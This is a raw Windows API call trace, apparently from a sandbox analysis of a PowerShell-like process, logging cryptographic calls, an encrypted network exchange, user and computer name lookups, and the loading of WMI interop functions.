	[0125.615] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x0, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xd7ef71c798) returned 1
	[0125.615] CoTaskMemAlloc (cb=0x20) returned 0x2ad3bac9080
	[0125.615] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798) returned 1
	[0125.616] CoTaskMemFree (pv=0x2ad3bac9080) 
	[0125.616] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x0, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xd7ef71c798) returned 1
	[0125.616] CoTaskMemAlloc (cb=0x20) returned 0x2ad3bac9080
	[0125.616] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798) returned 1
	[0125.616] CoTaskMemFree (pv=0x2ad3bac9080) 
	[0125.616] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x0, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xd7ef71c798) returned 1
	[0125.616] CoTaskMemAlloc (cb=0x20) returned 0x2ad3bac9080
	[0125.616] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798) returned 1
	[0125.616] CoTaskMemFree (pv=0x2ad3bac9080) 
	[0125.616] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x0, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xd7ef71c798) returned 1
	[0125.616] CoTaskMemAlloc (cb=0x20) returned 0x2ad3bac9080
	[0125.616] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798) returned 1
	[0125.616] CoTaskMemFree (pv=0x2ad3bac9080) 
	[0125.616] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x0, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xd7ef71c798) returned 1
	[0125.616] CoTaskMemAlloc (cb=0x20) returned 0x2ad3bac9080
	[0125.616] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x2ad3bac9080, pdwDataLen=0xd7ef71c798) returned 1
	[0125.616] CoTaskMemFree (pv=0x2ad3bac9080) 
	[0125.616] CryptGetProvParam (in: hProv=0x2ad3bb0ac10, dwParam=0x1, pbData=0x0, pdwDataLen=0xd7ef71c798, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xd7ef71c798) returned 0
	[0125.624] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d542f0
	[0125.624] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d542f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0125.624] CoTaskMemFree (pv=0x2ad22d542f0) 
	[0125.677] CryptImportKey (in: hProv=0x2ad3bb0ac10, pbData=0x2ad23b05c68, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0xd7ef71d978 | out: phKey=0xd7ef71d978*=0x2ad3bafcc20) returned 1
	[0125.677] CryptContextAddRef (hProv=0x2ad3bb0ac10, pdwReserved=0x0, dwFlags=0x0) returned 1
	[0125.689] GetVersionExW (in: lpVersionInformation=0xd7ef71c9d0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xd7ef71c9d0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0125.693] BCryptGetFipsAlgorithmMode (in: pfEnabled=0xd7ef71cbe0 | out: pfEnabled=0xd7ef71cbe0) returned 0x0
	[0125.764] CoCreateGuid (in: pguid=0xd7ef71ca80 | out: pguid=0xd7ef71ca80*(Data1=0x1a07000e, Data2=0x329e, Data3=0x4b21, Data4=([0]=0xa0, [1]=0x78, [2]=0x76, [3]=0x32, [4]=0x55, [5]=0xf6, [6]=0xd4, [7]=0x49))) returned 0x0
	[0125.983] CryptContextAddRef (hProv=0x2ad3bb0ac10, pdwReserved=0x0, dwFlags=0x0) returned 1
	[0125.984] CryptDuplicateKey (in: hKey=0x2ad3bafcc20, pdwReserved=0x0, dwFlags=0x0, phKey=0xd7ef71d548 | out: phKey=0xd7ef71d548*=0x2ad3bafbf00) returned 1
	[0125.984] CryptContextAddRef (hProv=0x2ad3bb0ac10, pdwReserved=0x0, dwFlags=0x0) returned 1
	[0125.984] CryptSetKeyParam (hKey=0x2ad3bafbf00, dwParam=0x4, pbData=0x2ad23bf51d8*=0x1, dwFlags=0x0) returned 1
	[0125.984] CryptSetKeyParam (hKey=0x2ad3bafbf00, dwParam=0x1, pbData=0x2ad23bf5188, dwFlags=0x0) returned 1
	[0125.998] CryptEncrypt (in: hKey=0x2ad3bafbf00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2ad23bff240*, pdwDataLen=0xd7ef71d658*=0x1a0, dwBufLen=0x1a0 | out: pbData=0x2ad23bff240*, pdwDataLen=0xd7ef71d658*=0x1a0) returned 1
	[0125.998] CryptEncrypt (in: hKey=0x2ad3bafbf00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2ad23bff418*, pdwDataLen=0xd7ef71d658*=0x0, dwBufLen=0x10 | out: pbData=0x2ad23bff418*, pdwDataLen=0xd7ef71d658*=0x10) returned 1
	[0126.126] select (in: nfds=0, readfds=0x2ad23c17d50, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71d2f0 | out: readfds=0x2ad23c17d50, writefds=0x0, exceptfds=0x0) returned 0
	[0126.128] EncryptMessage (in: phContext=0xd7ef71ce80, fQOP=0x0, pMessage=0x2ad23c18818, MessageSeqNo=0x0 | out: pMessage=0x2ad23c18818) returned 0x0
	[0126.128] send (in: s=0x7d0, buf=0x2ad23c18610*, len=245, flags=0 | out: buf=0x2ad23c18610*) returned 245
	[0126.129] EncryptMessage (in: phContext=0xd7ef71d000, fQOP=0x0, pMessage=0x2ad23c18c48, MessageSeqNo=0x0 | out: pMessage=0x2ad23c18c48) returned 0x0
	[0126.129] send (in: s=0x7d0, buf=0x2ad23c18940*, len=501, flags=0 | out: buf=0x2ad23c18940*) returned 501
	[0126.129] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0126.129] recv (in: s=0x7d0, buf=0x2ad23684c88, len=5, flags=0 | out: buf=0x2ad23684c88*) returned 5
	[0126.634] recv (in: s=0x7d0, buf=0x2ad23684c8d, len=528, flags=0 | out: buf=0x2ad23684c8d*) returned 528
	[0126.634] DecryptMessage (in: phContext=0xd7ef71ced0, pMessage=0x2ad23c18ef0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23c18ef0, pfQOP=0x0) returned 0x0
	[0126.635] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0126.635] SetEvent (hEvent=0x6b8) returned 1
	[0126.654] CryptAcquireContextW (in: phProv=0xd7ef71c940, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xd7ef71c940*=0x2ad3bb0c310) returned 1
	[0126.673] CryptImportKey (in: hProv=0x2ad3bb0c310, pbData=0x2ad2396d658, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0xd7ef71d978 | out: phKey=0xd7ef71d978*=0x2ad3bafc050) returned 1
	[0126.673] CryptContextAddRef (hProv=0x2ad3bb0c310, pdwReserved=0x0, dwFlags=0x0) returned 1
	[0126.712] CoTaskMemAlloc (cb=0x804) returned 0x2ad3bb1e290
	[0126.712] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2ad3bb1e290, nSize=0xd7ef71d918 | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0xd7ef71d918) returned 0x1
	[0126.713] CoTaskMemFree (pv=0x2ad3bb1e290) 
	[0126.714] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069dc20
	[0126.714] GetUserNameW (in: lpBuffer=0x2ad2069dc20, pcbBuffer=0xd7ef71d958 | out: lpBuffer="Nd9E1FYi", pcbBuffer=0xd7ef71d958) returned 1
	[0126.714] CoTaskMemFree (pv=0x2ad2069dc20) 
	[0126.716] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069b910
	[0126.716] GetComputerNameW (in: lpBuffer=0x2ad2069b910, nSize=0xd7ef71d958 | out: lpBuffer="X2VS1CUM", nSize=0xd7ef71d958) returned 1
	[0126.716] CoTaskMemFree (pv=0x2ad2069b910) 
	[0126.722] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d54a60
	[0126.723] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d54a60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0126.723] CoTaskMemFree (pv=0x2ad22d54a60) 
	[0126.727] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d55940
	[0126.727] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d55940, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0126.727] CoTaskMemFree (pv=0x2ad22d55940) 
	[0126.736] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d54a60
	[0126.736] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d54a60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0126.737] CoTaskMemFree (pv=0x2ad22d54a60) 
	[0126.830] CoGetObjectContext (in: riid=0xd7ef71d2f8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd7ef71d2f0 | out: ppv=0xd7ef71d2f0*=0x2ad205dbe30) returned 0x0
	[0126.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0xd7ef71be00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30
	[0126.835] CoTaskMemAlloc (cb=0x43) returned 0x2ad3baf0fd0
	[0126.835] LoadLibraryA (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\\\wminet_utils.dll") returned 0x7ffbf68f0000
	[0126.839] CoTaskMemFree (pv=0x2ad3baf0fd0) 
	[0126.839] CoTaskMemAlloc (cb=0xf) returned 0x2ad3bb1e620
	[0126.839] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="ResetSecurity") returned 0x7ffbf68f20e0
	[0126.839] CoTaskMemFree (pv=0x2ad3bb1e620) 
	[0126.849] CoTaskMemAlloc (cb=0xd) returned 0x2ad3bb1ea00
	[0126.849] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="SetSecurity") returned 0x7ffbf68f21b0
	[0126.849] CoTaskMemFree (pv=0x2ad3bb1ea00) 
	[0126.856] CoTaskMemAlloc (cb=0x14) returned 0x2ad3bb1e5a0
	[0126.856] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="BlessIWbemServices") returned 0x7ffbf68f2290
	[0126.856] CoTaskMemFree (pv=0x2ad3bb1e5a0) 
	[0126.866] CoTaskMemAlloc (cb=0x1a) returned 0x2ad3bac9f80
	[0126.867] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="BlessIWbemServicesObject") returned 0x7ffbf68f23b0
	[0126.867] CoTaskMemFree (pv=0x2ad3bac9f80) 
	[0126.874] CoTaskMemAlloc (cb=0x13) returned 0x2ad3bb1e700
	[0126.875] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="GetPropertyHandle") returned 0x7ffbf68f24d0
	[0126.875] CoTaskMemFree (pv=0x2ad3bb1e700) 
	[0126.880] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="WritePropertyValue") returned 0x7ffbf68f2500
	[0126.880] CoTaskMemFree (pv=0x2ad3bb1e980) 
	[0126.888] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="Clone") returned 0x7ffbf68f2530
	[0126.888] CoTaskMemFree (pv=0x2ad3bac2b30) 
	[0126.891] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="VerifyClientKey") returned 0x7ffbf68f31f0
	[0126.891] CoTaskMemFree (pv=0x2ad3bb1e5c0) 
	[0126.894] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="GetQualifierSet") returned 0x7ffbf68f2a50
	[0126.894] CoTaskMemFree (pv=0x2ad3bb1e500) 
	[0126.897] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="Get") returned 0x7ffbf68f2700
	[0126.897] CoTaskMemFree (pv=0x2ad3bac2ae0) 
	[0126.903] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="Put") returned 0x7ffbf68f26c0
	[0126.903] CoTaskMemFree (pv=0x2ad3bac2c20) 
	[0126.908] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="Delete") returned 0x7ffbf68f2750
	[0126.908] CoTaskMemFree (pv=0x2ad3bac2dd0) 
	[0126.910] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="GetNames") returned 0x7ffbf68f2760
	[0126.910] CoTaskMemFree (pv=0x2ad3bb1ea60) 
	[0126.913] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="BeginEnumeration") returned 0x7ffbf68f27b0
	[0126.913] CoTaskMemFree (pv=0x2ad3bb1e6a0) 
	[0126.915] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="Next") returned 0x7ffbf68f27c0
	[0126.915] CoTaskMemFree (pv=0x2ad3bac2e00) 
	[0126.918] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="EndEnumeration") returned 0x7ffbf68f2810
	[0126.918] CoTaskMemFree (pv=0x2ad3bb1e6e0) 
	[0126.920] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="GetPropertyQualifierSet") returned 0x7ffbf68f2820
	[0126.920] CoTaskMemFree (pv=0x2ad3bac9f80) 
	[0126.922] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="Clone") returned 0x7ffbf68f2530
	[0126.922] CoTaskMemFree (pv=0x2ad3bac2b00) 
	[0126.922] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="GetObjectText") returned 0x7ffbf68f2840
	[0126.922] CoTaskMemFree (pv=0x2ad3bb1e480) 
	[0126.925] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="SpawnDerivedClass") returned 0x7ffbf68f2860
	[0126.925] CoTaskMemFree (pv=0x2ad3bb1e840) 
	[0126.927] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="SpawnInstance") returned 0x7ffbf68f2880
	[0126.927] CoTaskMemFree (pv=0x2ad3bb1e540) 
	[0126.929] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="CompareTo") returned 0x7ffbf68f28a0
	[0126.929] CoTaskMemFree (pv=0x2ad3bb1e6e0) 
	[0126.931] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="GetPropertyOrigin") returned 0x7ffbf68f28c0
	[0126.931] CoTaskMemFree (pv=0x2ad3bb1e840) 
	[0126.934] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="InheritsFrom") returned 0x7ffbf68f28e0
	[0126.934] CoTaskMemFree (pv=0x2ad3bb1e360) 
	[0126.936] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="GetMethod") returned 0x7ffbf68f28f0
	[0126.936] CoTaskMemFree (pv=0x2ad3bb1eaa0) 
	[0126.938] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="PutMethod") returned 0x7ffbf68f2940
	[0126.938] CoTaskMemFree (pv=0x2ad3bb1e700) 
	[0126.940] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="DeleteMethod") returned 0x7ffbf68f2990
	[0126.940] CoTaskMemFree (pv=0x2ad3bb1e9c0) 
	[0126.942] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="BeginMethodEnumeration") returned 0x7ffbf68f29a0
	[0126.942] CoTaskMemFree (pv=0x2ad3bb1e500) 
	[0126.943] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="NextMethod") returned 0x7ffbf68f29b0
	[0126.943] CoTaskMemFree (pv=0x2ad3bb1e8c0) 
	[0126.946] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="EndMethodEnumeration") returned 0x7ffbf68f2a00
	[0126.946] CoTaskMemFree (pv=0x2ad3bb1e540) 
	[0126.947] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="GetMethodQualifierSet") returned 0x7ffbf68f2a10
	[0126.947] CoTaskMemFree (pv=0x2ad3bb1e360) 
	[0126.948] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="GetMethodOrigin") returned 0x7ffbf68f2a30
	[0126.948] CoTaskMemFree (pv=0x2ad3bb1e360) 
	[0126.951] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="QualifierSet_Get") returned 0x7ffbf68f2a60
	[0126.951] CoTaskMemFree (pv=0x2ad3bb1e5c0) 
	[0126.955] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="QualifierSet_Put") returned 0x7ffbf68f2ab0
	[0126.955] CoTaskMemFree (pv=0x2ad3bb1e6a0) 
	[0126.958] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="QualifierSet_Delete") returned 0x7ffbf68f2ae0
	[0126.958] CoTaskMemFree (pv=0x2ad3bb1e500) 
	[0126.960] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="QualifierSet_GetNames") returned 0x7ffbf68f2af0
	[0126.960] CoTaskMemFree (pv=0x2ad3bb1ea60) 
	[0126.962] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="QualifierSet_BeginEnumeration") returned 0x7ffbf68f2b10
	[0126.962] CoTaskMemFree (pv=0x2ad3bac9bf0) 
	[0126.964] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="QualifierSet_Next") returned 0x7ffbf68f2b20
	[0126.964] CoTaskMemFree (pv=0x2ad3bb1e7a0) 
	[0126.967] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="QualifierSet_EndEnumeration") returned 0x7ffbf68f2b70
	[0126.967] CoTaskMemFree (pv=0x2ad3baca130) 
	[0126.972] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="GetCurrentApartmentType") returned 0x7ffbf68f2a50
	[0126.972] CoTaskMemFree (pv=0x2ad3baca2e0) 
	[0126.974] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="GetDemultiplexedStub") returned 0x7ffbf68f2060
	[0126.974] CoTaskMemFree (pv=0x2ad3bb1e740) 
	[0126.977] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="CreateInstanceEnumWmi") returned 0x7ffbf68f1760
	[0126.977] CoTaskMemFree (pv=0x2ad3bb1e740) 
	[0126.981] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="CreateClassEnumWmi") returned 0x7ffbf68f18c0
	[0126.981] CoTaskMemFree (pv=0x2ad3bb1e6a0) 
	[0126.983] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="ExecQueryWmi") returned 0x7ffbf68f1a20
	[0126.983] CoTaskMemFree (pv=0x2ad3bb1e620) 
	[0126.991] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="ExecNotificationQueryWmi") returned 0x7ffbf68f1b90
	[0126.991] CoTaskMemFree (pv=0x2ad3baca430) 
	[0127.002] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="PutInstanceWmi") returned 0x7ffbf68f1d00
	[0127.002] CoTaskMemFree (pv=0x2ad3bb1e540) 
	[0127.011] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="PutClassWmi") returned 0x7ffbf68f1e00
	[0127.011] CoTaskMemFree (pv=0x2ad3bb1ea40) 
	[0127.019] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="CloneEnumWbemClassObject") returned 0x7ffbf68f1f00
	[0127.019] CoTaskMemFree (pv=0x2ad3bac9e30) 
	[0127.027] GetProcAddress (hModule=0x7ffbf68f0000, lpProcName="ConnectServerWmi") returned 0x7ffbf68f34c0
	[0127.027] CoTaskMemFree (pv=0x2ad3bb1e480) 
	[0127.041] IComThreadingInfo:GetCurrentApartmentType (in: This=0x2ad205dbe30, pAptType=0xd7ef71d310 | out: pAptType=0xd7ef71d310*=1) returned 0x0
	[0127.041] IUnknown:QueryInterface (in: This=0x2ad205dbe30, riid=0x2ad238546d8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0xd7ef71d418 | out: ppvObject=0xd7ef71d418*=0x0) returned 0x80004002
	[0127.041] IUnknown:Release (This=0x2ad205dbe30) returned 0x1
	[0127.045] IIDFromString (in: lpsz="{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}", lpiid=0xd7ef71cb10 | out: lpiid=0xd7ef71cb10) returned 0x0
	[0127.045] CoGetClassObject (in: rclsid=0x2ad3bb03848*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7ffbf57cd250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd7ef71c980 | out: ppv=0xd7ef71c980*=0x2ad3bb1e720) returned 0x0
	[0127.047] WbemDefPath:IUnknown:QueryInterface (in: This=0x2ad3bb1e720, riid=0x7ffbf57cd2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0xd7ef71c690 | out: ppvObject=0xd7ef71c690*=0x0) returned 0x80004002
	[0127.047] WbemDefPath:IClassFactory:CreateInstance (in: This=0x2ad3bb1e720, pUnkOuter=0x0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c678 | out: ppvObject=0xd7ef71c678*=0x2ad3bb12980) returned 0x0
	[0127.047] IUnknown:QueryInterface (in: This=0x2ad3bb12980, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c580 | out: ppvObject=0xd7ef71c580*=0x2ad3bb12980) returned 0x0
	[0127.047] IUnknown:QueryInterface (in: This=0x2ad3bb12980, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xd7ef71c600 | out: ppvObject=0xd7ef71c600*=0x0) returned 0x80004002
	[0127.048] IUnknown:AddRef (This=0x2ad3bb12980) returned 0x3
	[0127.048] CoGetContextToken (in: pToken=0xd7ef71c250 | out: pToken=0xd7ef71c250) returned 0x0
	[0127.048] CoGetObjectContext (in: riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2ad3baf1628 | out: ppv=0x2ad3baf1628*=0x2ad205dbe18) returned 0x0
	[0127.048] IUnknown:QueryInterface (in: This=0x2ad3bb12980, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c210 | out: ppvObject=0xd7ef71c210*=0x2ad3bb1e560) returned 0x0
	[0127.048] IMarshal:GetUnmarshalClass (in: This=0x2ad3bb1e560, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0xd7ef71c240 | out: pCid=0xd7ef71c240) returned 0x0
	[0127.048] IUnknown:Release (This=0x2ad3bb1e560) returned 0x3
	[0127.048] CoGetContextToken (in: pToken=0xd7ef71c220 | out: pToken=0xd7ef71c220) returned 0x0
	[0127.048] IUnknown:AddRef (This=0x2ad3bb12980) returned 0x4
	[0127.048] IUnknown:QueryInterface (in: This=0x2ad3bb12980, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c338 | out: ppvObject=0xd7ef71c338*=0x0) returned 0x80004002
	[0127.048] IUnknown:Release (This=0x2ad3bb12980) returned 0x3
	[0127.049] IUnknown:Release (This=0x2ad3bb12980) returned 0x2
	[0127.049] WbemDefPath:IUnknown:Release (This=0x2ad3bb1e720) returned 0x0
	[0127.049] IUnknown:Release (This=0x2ad3bb12980) returned 0x1
	[0127.049] CoGetContextToken (in: pToken=0xd7ef71cf50 | out: pToken=0xd7ef71cf50) returned 0x0
	[0127.049] CoGetContextToken (in: pToken=0xd7ef71ce90 | out: pToken=0xd7ef71ce90) returned 0x0
	[0127.049] IUnknown:AddRef (This=0x2ad3bb12980) returned 0x2
	[0127.049] IUnknown:QueryInterface (in: This=0x2ad3bb12980, riid=0xd7ef71cfd0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xd7ef71cfb0 | out: ppvObject=0xd7ef71cfb0*=0x2ad3bb12980) returned 0x0
	[0127.049] IUnknown:Release (This=0x2ad3bb12980) returned 0x2
	[0127.049] IUnknown:Release (This=0x2ad3bb12980) returned 0x1
	[0127.050] CoGetObjectContext (in: riid=0xd7ef71c278*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd7ef71c270 | out: ppv=0xd7ef71c270*=0x2ad205dbe30) returned 0x0
	[0127.050] IComThreadingInfo:GetCurrentApartmentType (in: This=0x2ad205dbe30, pAptType=0xd7ef71c290 | out: pAptType=0xd7ef71c290*=1) returned 0x0
	[0127.050] IUnknown:QueryInterface (in: This=0x2ad205dbe30, riid=0x2ad238546d8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0xd7ef71c398 | out: ppvObject=0xd7ef71c398*=0x0) returned 0x80004002
	[0127.050] IUnknown:Release (This=0x2ad205dbe30) returned 0x2
	[0127.051] WbemDefPath:IClassFactory:CreateInstance (in: This=0x2ad3bb1e980, pUnkOuter=0x0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71b5f8 | out: ppvObject=0xd7ef71b5f8*=0x2ad3bb11e40) returned 0x0
	[0127.051] IUnknown:QueryInterface (in: This=0x2ad3bb11e40, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71b500 | out: ppvObject=0xd7ef71b500*=0x2ad3bb11e40) returned 0x0
	[0127.051] IUnknown:QueryInterface (in: This=0x2ad3bb11e40, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xd7ef71b580 | out: ppvObject=0xd7ef71b580*=0x0) returned 0x80004002
